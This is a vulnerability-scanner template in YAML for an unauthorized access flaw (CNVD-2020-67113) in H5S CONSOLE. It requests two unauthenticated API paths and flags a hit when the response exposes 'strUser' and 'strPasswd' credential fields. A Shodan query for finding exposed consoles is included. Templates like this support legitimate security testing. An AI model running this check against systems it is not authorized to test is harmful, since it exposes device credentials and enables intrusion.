id: CNVD-2020-67113

info:
  name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113)
  author: ritikchaddha
  severity: high
  description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability
  reference:
    - https://vul.wangan.com/a/CNVD-2020-67113
  metadata:
    shodan-query: http.title:"H5S CONSOLE"
  tags: h5s,unauth,h5sconsole,cnvd,cnvd2020

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/GetSrc"
      - "{{BaseURL}}/api/v1/GetDevice"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'strUser'
          - 'strPasswd'
        condition: and

      - type: word
        part: body
        words:
          - 'H5_AUTO'
          - 'H5_DEV'
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200